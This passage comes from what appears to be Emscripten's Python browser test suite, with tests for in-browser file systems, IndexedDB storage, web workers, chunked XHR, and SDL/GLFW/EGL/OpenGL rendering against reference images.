self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
# compress in emcc, -sLZ4 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
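    # Build the worker with and without a preloaded data file, and verify its output both
    # from the page above and when run standalone (outside a worker).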
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
    checksum = zlib.adler32(data) & 0xffffffff # mask to an unsigned 32-bit value (Python 2's adler32 could return a signed int)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
    for _ in range(60):
      try:
        urlopen('http://localhost:11111')
        break
      except Exception:
        print('(sleep for server)')
        time.sleep(1)
    else:
      # the loop index never reaches 60, so use for/else to detect that every attempt failed
      raise Exception('chunked XHR test server failed to start within 60 seconds')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
      # Avoid a race condition on cleanup: wait a bit so that the processes have released their file locks,
      # otherwise the test tearDown would attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
    # test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
  @parameterized({
    '': (False,),
    # 'proxy' runs the same program via --proxy-to-worker
    'proxy': (True,)
  })
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
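    # Each sample links against GL/EGL/X11; the texture-based chapters additionally preload their .tga assets below.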
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
    self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-sASSERTIONS=0'])
    self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-sASSERTIONS=1'])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],
]:
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
